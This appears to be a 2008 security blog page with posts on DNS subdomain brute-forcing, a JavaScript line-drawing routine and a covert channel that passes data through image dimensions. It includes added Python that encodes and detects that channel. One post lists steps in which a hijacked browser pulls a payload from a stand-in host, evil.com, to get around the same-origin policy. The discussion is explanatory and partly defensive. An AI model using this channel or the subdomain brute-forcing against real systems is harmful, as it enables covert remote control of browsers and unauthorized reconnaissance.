I am a hacker and you are afraid and that makes you more dangerous than I ever could be.

Who needs security when you have a robot? (ajc.com)

Topic: Current Events
12:44 pm EST, Feb 22, 2008
Late at night several times a week, Terrill powers up the 4-foot-tall, 300-pound device and reaches for a remote control packed with two joysticks and various knobs and switches. Standing on a nearby corner, he maneuvers the machine down the block, often to a daycare center where it accosts what Terrill says are drug dealers, vagrants and others who shouldn't be there. He flashes the robot's spotlight and grabs a walkie-talkie, which he uses to boom his disembodied voice over the robot's sound system. "I tell them they are trespassing, it's private property, and they have to leave," he said. "They throw bottles and cans at it. That's when I shoot the water cannon. They just scatter like roaches."
OMG, I can't believe he actually built it, and I can't believe it actually works. You now have something more to look forward to at O'Terrill's besides the fish and chips!

Topic: Miscellaneous
5:42 pm EST, Feb 19, 2008
"There is a non-zero chance that the DOJ would fuck with you."

Subdomain bruting and you!

Topic: Technology
10:41 am EST, Feb 19, 2008
Old timers here will know about the concept of bruteforcing DNS using the clues available, i.e. zone transfers disabled, but you see that the NS and MX servers are called gandalf.company.com and elrond.company.com. Effectively, trying frodo.company.com is going to make good sense. To this end BidiBlah will do this automagically for you and tries to eke out info (a little while back I saw fierce-scanner pop up in a similar vein!). Young Mr Wilkinson ran up against a company last night with disabled transfers, but the 2 DNS servers showed up as:
* asimov.company.com
* heinlein.company.com
A quick trip to Wikipedia shows that both are American sci-fi authors.
Very cool! A DNS bruter using Wikipedia/Google to attempt to find relationships between subdomains. Bruting is fairly straightforward, and the trick has always been what values you should try. I faced this challenge about a month ago when I wrote a DNS bruter. Over the last 3 years or so I've made something of a hobby of collecting massive sets of URLs. At last count I had just under 90 million. I mined these and created a list of the 1000 most common subdomains. Not as sexy as BidiBlah, but effective.
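The wordlist-mining step described above (take a large URL corpus, pull out the hostnames, count which subdomain prefixes recur) is simple enough to show in full. The Python below is an added example, not the poster's bruter nor any BidiBlah or fierce code: it extracts the subdomain part of each URL's host, tallies the most common prefixes, and then turns the list around for the defender, answering which of your own hostnames a dictionary-based enumerator armed with that list would find. The URL sample, the hypothetical hostnames and the tiny hard-coded set of two-label public suffixes are constructed assumptions for the example; a real tool would consult the Public Suffix List.

```python
from collections import Counter
from urllib.parse import urlsplit

# Constructed sample corpus, standing in for the ~90M URL collection the post mentions.
SAMPLE_URLS = [
    "http://www.example.com/index.html",
    "https://mail.example.com/login",
    "http://www.example.org/",
    "https://dev.example.net:8443/api",   # port is dropped by .hostname
    "http://mail.example.org/",
    "https://www.example.net/a/b",
    "http://ftp.example.net/pub",
    "http://example.com/",                # bare registrable domain: no subdomain label
    "http://192.0.2.10/",                 # IPv4 literal: skipped
    "not a url",                          # junk line: skipped
    "https://Mail.Example.Com/",          # case-folded to 'mail'
]

# Assumption for this example: a few suffixes whose registrable domain has three labels.
# Real code should load the Public Suffix List instead of hard-coding this.
TWO_LABEL_SUFFIXES = {"co.uk", "com.au", "co.jp"}


def registrable_suffix_len(labels):
    """Number of trailing labels that make up the registrable domain (eTLD+1)."""
    if len(labels) >= 3 and ".".join(labels[-2:]) in TWO_LABEL_SUFFIXES:
        return 3
    return 2


def subdomain_labels(url):
    """Return the subdomain labels of a URL's host, leftmost first, or [] if there are none."""
    try:
        host = urlsplit(url).hostname
    except ValueError:          # malformed bracketed IPv6 host and similar
        return []
    if not host or ":" in host or host.replace(".", "").isdigit():
        return []               # empty host, IPv6 literal or IPv4 literal
    labels = host.lower().strip(".").split(".")
    n = registrable_suffix_len(labels)
    if len(labels) <= n:
        return []
    return labels[:-n]


def most_common_subdomains(urls, top_n=1000):
    """Tally the subdomain prefix ('www', 'mail', 'a.b', ...) of every host in the corpus
    and return the top_n prefixes with their counts, most frequent first."""
    counter = Counter()
    for url in urls:
        labels = subdomain_labels(url)
        if labels:
            counter[".".join(labels)] += 1
    return counter.most_common(top_n)


def guessable_hosts(hostnames, wordlist):
    """Defender view: which of these hostnames would a dictionary-based enumerator hit
    with this wordlist? Exact, case-insensitive match on the subdomain prefix."""
    words = {w.lower() for w in wordlist}
    return [h for h in hostnames if ".".join(subdomain_labels("http://" + h)) in words]


if __name__ == "__main__":
    top = most_common_subdomains(SAMPLE_URLS)
    for prefix, count in top:
        print(f"{count:6d}  {prefix}")
    # Hypothetical internal names, constructed for the example.
    mine = ["mail.corp.example", "zx9q.corp.example"]
    print("guessable:", guessable_hosts(mine, [p for p, _ in top]))
```

The counting is deliberately per-prefix rather than per-label, so 'a.b' and 'b' are separate entries; that is the shape a bruter actually tries. The inverse check is the useful one for a zone owner: any name on the guessable list is one that zone-transfer restrictions alone will not hide.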

Topic: Miscellaneous
5:30 pm EST, Feb 18, 2008
Jason Scott on the opinionated hordes.

I had forgotten, I guess, how easy it is for people to take a few quick glances at some data and shove their two-line thesis out the door. Or to then proceed to make even more conclusions based on this thesis. And then, how easy it is for this quarter-baked half-thesis to become an addendum to the original data, as if, you know, they deserved it. I like nothing more than to browse people who have no idea who or what the hell I am, what I've done, what I'm doing, or any other data points, and then just make all these great conclusions about me. It's refreshing. They're neither friend nor foe. They're just observers, as so much of this medium turns us into

And of course, the original Penny Arcade Internet Fuckwad strip.
Internet Fuckwad Redux

Bresenham's line algorithm

Topic: Miscellaneous
5:08 am EST, Feb 18, 2008
// Bresenham line from (x0, y0) to (x1, y1), plotted into this.buffer.
// One add and one compare per pixel; no multiplies, no per-pixel division.
DrawingSpace.prototype.drawLine = function(x0, y0, x1, y1) {
    var steep = Math.abs(y1 - y0) > Math.abs(x1 - x0);
    var tmp = 0;
    if (steep) {
        // Closer to vertical: swap the axes so the loop always walks along x.
        tmp = y0; y0 = x0; x0 = tmp;   // swap(x0, y0)
        tmp = y1; y1 = x1; x1 = tmp;   // swap(x1, y1)
    }
    if (x0 > x1) {
        // Always step from left to right.
        tmp = x1; x1 = x0; x0 = tmp;   // swap(x0, x1)
        tmp = y0; y0 = y1; y1 = tmp;   // swap(y0, y1)
    }
    var deltax = x1 - x0;
    var deltay = Math.abs(y1 - y0);
    // Accumulated error. For even deltax this starts at a half-integer; every later
    // update adds or subtracts a whole number, so the value stays exact in a double
    // and the >= 0 test below never lands on a tie.
    var error = -(deltax + 1) / 2;
    var ystep;
    var y = y0;
    if (y0 < y1) {
        ystep = 1;
    } else {
        ystep = -1;
    }
    for (var x = x0; x <= x1; x++) {
        // Undo the axis swap when plotting.
        if (steep) {
            this.buffer.setXY(y, x);
        } else {
            this.buffer.setXY(x, y);
        }
        error += deltay;
        if (error >= 0) {
            y += ystep;
            error -= deltax;
        }
    }
};
Now why would you ever need an integer optimized line drawing algorithm in JavaScript? :-)

Topic: Miscellaneous
9:11 am EST, Feb 15, 2008
Today I used the phrase "John Terrill Approved" to win an argument. Yes, it was excellent.

Topic: Miscellaneous
9:58 pm EST, Feb 14, 2008
Events can be set to trap when the image has finished loading and what the size of the image is. This creates a side channel for JavaScript to communicate with certain third-party hosts using the dimensions of the image. In practice, XBM images tend to work best because you can specify arbitrary lengths and widths up to a 15-bit integer without actually needing an image of that size.
I knew I had talked about this publicly before! This was from Jan of 2007. Good to know I'm not going crazy :-)
More image side channels

Using Image Dimensions as a side channel

Topic: Technology
1:16 pm EST, Feb 14, 2008
Arshan over at Aspect posted something that sounds very familiar indeed over on his blog.

Disclaimer: I know this isn’t earth-shattering now when the sandbox isn’t there, but I think it’s cool that using image tags we can create a completely covert channel for bypassing the same origin policy and control browsers remotely. Just to be clear, this is not a traditional same-origin bypass where we’re on http://evil.com/ and we’re talking to http://mybank.com/. We’re talking about a hijacked client who’s in collusion with an evil server that wants to deliver the client some message, be it a code payload, instructions, etc. Can we restrict JavaScript from dynamically loading image tags? No more image pre-loading? I doubt it! Here’s how it works.
* Client dynamically creates an Image() and points the source to http://evil.com/evil.cgi?password=somesecret
* Server responds with an image that is 16 pixels tall and 1 pixel wide (16 represents in this phase the total length of the payload)
* Client then starts a loop that iterates 16/2 times:
  o Client dynamically creates a new Image() and points the source to http://evil.com/evil.cgi?password=somesecret&i=
  o The new image has height x, width y
  o Client appends ASCII character value of x onto payload string
  o Client appends ASCII character value of y onto payload string
* Client now has authenticated, 16-length payload to do whatever they want with
Hehe. I was wondering when someone would talk about this! John Terrill and I looked at this back in late 2006, early 2007 and took this a little further than Arshan did. Here is what we came up with: The carry capacity of a side channel is an important factor. Arshan's solution is not very good because of the limited capacity. How can we use dimensions as a side channel and not have to send tens of kilobytes to transfer a few bytes of data in the side channel? That's the "$1,000,000 and a Monster Truck" question which started John and I researching. Let's take GIF images. According to the spec, length and width are 16-bit integers, giving us 4 bytes of data. However, if I need to send 0xFFFFFFFF it would suck to have to transmit an image that is 65535x65535. That would be huge. But GIFs are compressed, right? Remember that JavaScript cannot access pixel data of the Image objects it creates, so we really don't care about what's in this picture. What if we make it all white? That should compress well. While it does, you are still sending a...
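The two posts above describe the channel in words: the payload leaves the server as image dimensions and the client reads it back from width and height. The Python below is an added example, not code from Arshan, John Terrill or the poster. It packs bytes into (width, height) pairs for the 16-bit GIF case and the 15-bit XBM case the earlier post mentions, works out how many image fetches a payload costs (Arshan's scheme of one ASCII character per field is field_bits=8, which reproduces the 16/2 loop count above), and, on the defender side, reads the declared size out of a real GIF header so a proxy or response scanner can flag a response whose declared canvas is far larger than its byte count. The pixels-per-byte threshold and the two header-only sample blobs are constructed assumptions for the example, not real images.

```python
import struct

# Bits per dimension field. GIF stores logical screen width and height as
# 16-bit little-endian integers; the earlier post describes XBM as accepting
# arbitrary values up to a 15-bit integer.
GIF_FIELD_BITS = 16
XBM_FIELD_BITS = 15


def bytes_per_image(field_bits):
    """Whole payload bytes one image carries: two fields, width and height."""
    return 2 * (field_bits // 8)


def images_needed(payload_len, field_bits):
    """Image fetches required to move payload_len bytes (ceiling division).
    Arshan's one-ASCII-character-per-field scheme is field_bits=8."""
    return -(-payload_len // bytes_per_image(field_bits))


def encode_dimensions(payload, field_bits):
    """Split payload into (width, height) pairs, big-endian, zero-padded at the end."""
    per_field = field_bits // 8
    per_image = 2 * per_field
    padded = payload + b"\x00" * (-len(payload) % per_image)
    pairs = []
    for i in range(0, len(padded), per_image):
        w = int.from_bytes(padded[i:i + per_field], "big")
        h = int.from_bytes(padded[i + per_field:i + per_image], "big")
        pairs.append((w, h))
    return pairs


def decode_dimensions(pairs, field_bits, length):
    """Reassemble the first `length` bytes from (width, height) pairs; in the
    protocol above the length arrives in the first image's height."""
    per_field = field_bits // 8
    out = b"".join(w.to_bytes(per_field, "big") + h.to_bytes(per_field, "big")
                   for w, h in pairs)
    return out[:length]


# ---- defender side: what a proxy or response scanner can read from the bytes ----

def gif_declared_size(data):
    """(width, height) from a GIF header, or None if the bytes are not a GIF.
    Layout: 6-byte signature 'GIF87a'/'GIF89a', then width and height as uint16 LE."""
    if len(data) < 10 or data[:6] not in (b"GIF87a", b"GIF89a"):
        return None
    return struct.unpack_from("<HH", data, 6)


def suspicious_gif(data, max_pixels_per_byte=1000):
    """Flag a GIF whose declared canvas is implausibly large for its size on the wire.
    The threshold is an assumption for this example (a long run of identical pixels
    still costs LZW codes, so legitimate files stay well below it); tune it locally."""
    dims = gif_declared_size(data)
    if dims is None:
        return False
    w, h = dims
    return w * h > max_pixels_per_byte * len(data)


# Constructed sample blobs: a GIF header alone (no image data) claiming the maximum
# canvas, and a 16x16 header followed by filler bytes. Neither is a decodable image.
HEADER_ONLY_GIF = b"GIF89a" + struct.pack("<HH", 65535, 65535) + b"\x00\x00\x00"
SMALL_GIF_HEADER = b"GIF89a" + struct.pack("<HH", 16, 16) + b"\x00\x00\x00" + b"\x00" * 60


if __name__ == "__main__":
    secret = b"\xde\xad\xbe\xef\x01"                 # constructed payload
    for bits in (8, XBM_FIELD_BITS, GIF_FIELD_BITS):
        print(f"{bits:2d}-bit fields: {bytes_per_image(bits)} bytes/image, "
              f"{images_needed(len(secret), bits)} fetches for {len(secret)} bytes")
    pairs = encode_dimensions(secret, GIF_FIELD_BITS)
    assert decode_dimensions(pairs, GIF_FIELD_BITS, len(secret)) == secret
    print("GIF pairs:", [(hex(w), hex(h)) for w, h in pairs])
    print("header-only 65535x65535 flagged:", suspicious_gif(HEADER_ONLY_GIF))
    print("16x16 flagged:", suspicious_gif(SMALL_GIF_HEADER))
```

The capacity arithmetic is the point of the post: with full 16-bit fields every fetch moves 4 bytes instead of 2 characters, so the fetch count halves, and the decision the post is circling is what the body of such an image costs on the wire. The declared-versus-delivered ratio is the cheap check on the other side: a response whose header promises orders of magnitude more pixels than its bytes could plausibly encode is worth logging, whatever the client does with it.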